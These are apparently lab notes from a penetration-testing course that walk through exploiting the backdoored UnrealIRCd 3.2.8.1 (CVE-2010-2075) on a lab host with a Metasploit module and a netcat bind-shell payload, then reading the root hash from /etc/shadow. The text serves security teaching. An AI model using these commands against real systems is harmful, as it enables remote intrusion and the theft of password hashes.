Lesson 3 Lab Notes

In this lab we will do the following:
  • Use the saved NMap results to search for the Unreal daemon
  • Exploit the Unreal daemon.
  • Obtain root.
  • Copy the root hash.
What UnrealRCd?

UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.

CVE Information:

http://www.cvedetails.com/cve/cve-2010-2075

UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.

Module Information:

Rapid7 shows you what metasploit module to use https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor

And exploit-db, shows you the code of the module https://www.exploit-db.com/exploits/16922/

Instructions:
search unreal
use exploit/unix/irc/unreal_ircd_3281_backdoor
set PAYLOAD cmd/unix/bind_netcat
show options
set RHOST 172.16.56.2
set LHOST 172.16.56.4 (Use your own IP address ie 10.0.2.15)

To run the exploit and immediately background the session use the -z switch. If you expect to have more than one session then use the -j switch instead. To interact with a background session you will need to use the 'sessions -i ID' command

exploit -z
sessions -l
sessions -i 1

It's always a good idea to do some basic commands like whoami and hostname to verify your victim's information

whoami
hostname

Now we use grep to output only the password hash for the root located in the /etc/shadow file. :)

grep root /etc/shadow

http://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson7/index.html

results matching ""

    No results matching ""